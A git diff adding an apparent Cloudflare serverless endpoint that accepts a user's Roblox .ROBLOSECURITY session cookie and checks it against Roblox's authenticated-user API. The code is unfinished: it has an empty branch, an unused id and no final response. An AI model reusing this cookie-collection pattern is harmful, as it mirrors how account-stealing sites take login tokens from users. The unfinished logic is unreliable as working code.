diff --git a/functions/api/data-transfers/create.ts b/functions/api/data-transfers/create.ts
new file mode 100644
index 0000000..85eb574
--- /dev/null
+++ b/functions/api/data-transfers/create.ts
@@ -0,0 +1,36 @@
+export async function onRequestPost(context: RequestContext) {
+  const { cookie, has_access } = context.data.body;
+
+  if (
+    typeof has_access !== "boolean" ||
+    has_access && typeof cookie !== "string" ||
+    has_access && !cookie.match(/_\|WARNING:-DO-NOT-SHARE-THIS\.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-F\d]+/)
+  )
+    return new Response('{"error":"Invalid request"}', {
+      headers: {
+        "content-type": "application/json",
+      },
+      status: 400,
+    });
+
+  const id = (context.request.headers.get("cf-ray")?.split("-")[0] as string) + Date.now().toString() + crypto.randomUUID().replaceAll("-", "");
+
+  if (!has_access) {
+
+  }
+  const authedUserReq = await fetch("https://users.roblox.com/v1/users/authenticated", {
+    headers: {
+      cookie: `.ROBLOSECURITY=${cookie}`,
+    },
+  });
+
+  if (!authedUserReq.ok)
+    return new Response('{"error":"Cookie is invalid"}', {
+      headers: {
+        "content-type": "application/json",
+      },
+      status: 400
+    });
+
+  const authedUser: { id: number, name: string } = await authedUserReq.json();
+}